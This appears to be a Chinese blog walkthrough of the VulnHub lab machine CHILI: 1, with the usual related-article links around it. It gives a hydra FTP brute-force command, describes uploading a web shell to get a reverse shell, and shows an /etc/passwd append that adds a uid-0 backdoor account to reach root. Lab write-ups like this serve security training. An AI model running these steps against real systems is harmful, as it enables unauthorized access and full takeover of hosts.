VulnHub靶场之CHILI: 1

最新推荐文章于 2024-04-29 09:19:58 发布
最新推荐文章于 2024-04-29 09:19:58 发布
阅读量837 收藏 6
点赞数 1
分类专栏: 靶场实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/108928297
版权

VulnHub靶场之CHILI: 1

扫描IP以及端口:
在这里插入图片描述
访问80端口,一个小辣椒,目录扫描,啥都没有,只能从ftp下手了:
在这里插入图片描述
看了看hint,用chili当作用户名试试破解一下密码:
在这里插入图片描述
利用hydra破解ftp密码:

hydra -l chili -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.198.150

得到密码:
在这里插入图片描述

成功进入:
在这里插入图片描述
进入到/var/www/html下,.nano下可读可写:
在这里插入图片描述
上传shell文件,别忘了加权限chmod 777:
在这里插入图片描述
访问,监听:
在这里插入图片描述
就一个用户chili,,,内核也较新:
在这里插入图片描述
发现passwd可以写入:
在这里插入图片描述
直接利用kali的工具openssl:

openssl passwd -1 -salt shell 123

在这里插入图片描述
写入到passwd:

echo 'shell:$1$shell$5TvJA7y/9faSDWR84IKgZ/:0:0::/root:/bin/bash'>>/etc/passwd

在这里插入图片描述
成功获取root权限,读取flag:
在这里插入图片描述

A_dmins
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
chili:以人为中心的编程
05-12
有名的入门应用程序 :roasted_sweet_potato: 基于的出色。 特征 React + ReactDOM(16.3.0)-更新了! 打字稿(具有TSLint设置) 漂亮+ tslint-config-prettier 使用Jest +酶测试配置 包裹捆扎机-1.7.0 ...
chili:Go 的简单表达式评估引擎
05-29
表达式是一个评估为单个值的衬垫特征数字准确性(使用 github.com/shopspring/decimal pkg) 可扩展简单语法安装$ go get github.com/5anthosh/chili例子 package mainimport ( "fmt" "github.com/5anthosh/chili")...
每周打靶VulnHub靶机-CHILI_ 1
m0_54178755的博客
09-30 313
VulnHub靶机-CHILI: 1
vulnhubChili 靶机
Nicky_Zheng的博客
01-29 730
1、信息收集 1.1、端口扫描 已通过netdiscover发现靶机 ip:192.168.57.142 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 17:11 CST Nmap scan report for 192.168.57.142 Host
VulnHub靶场-Lampiao
最新发布
weixin_48972359的博客
04-29 630
靶机:Lampiao靶机中只有一个存放在root家目录中的flag。
[vulnhub系列]Chili-靶机
薛定谔嘚喵博客
03-07 1962
在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;
vulnhub靶场实战系列(三)之 dc9
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-11 475
发现存在一个目录包含漏洞,我们这里仔细观察发现,这里爆出来的用户名和之前我们数据库跑出来的用户名字居然可以一一对应上,也就是说,我们跑出来的不是网站的用户,而是登录靶机ssh服务的用户,接下来我们就去爆破ssh服务。在使用fuzz爆破前,这里还有一个点要注意,因为我们要爆破的是登录后的页面,所以我们这里首先要获取他的cookie值,再进行爆破。我们发现这里有两个列,一个是username,一个是password,我们先将这两个列单独提取出来,方便后续的渗透使用。面对这样的一个网页,我们应该怎样入手呢?
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7427
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1664
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
chili:轻量级简单的 RPC 守护进程
06-25
Chili 可以从命令行运行,使用命令 Chili chili --port=8080 。 端口默认为 8000。这将在指定的端口上启动一个 HTTP 服务器,为请求做好准备。 Chili 可以从命令行使用--key=[path to server key]和--crt=[path to...
maroon1-chili
03-08
:sparkles: 方芒果 :sparkles: 这是一个使用Git作为的网站。 它是在不到一分钟的时间内使用创建的。 您可以像这样,或探索一些变体。 如何不同: :artist_palette: 看 :pencil: 内容管理系统 ...
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2497
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6004
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 1522
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1646
Vulnhub靶场Prime_Series_Level-1渗透
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1320
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
带你玩转渗透测试靶场Vulnhub——hacksudo3
m0_74025111的博客
04-24 521
从目录里面发现/hidden/ 我们先去访问一下http://192.168.1.108/hidden,由此发现好像是一个解密的。我们先来访问默认的登录页面:http://192.168.1.108/login.php 竟然发现了这个网页的登录页面。继续访问下一个,http://192.168.1.108/decrypt/ 发现这个也是一个解密的网站。访问:http://192.168.1.108/bruteforce/这也是一个解密用的网站。以上的命令都可以执行的话,证明是存在命令注入漏洞的。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2383
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3437
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
xmind 报错TypeError: Cannot read properties of undefined
08-19
{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值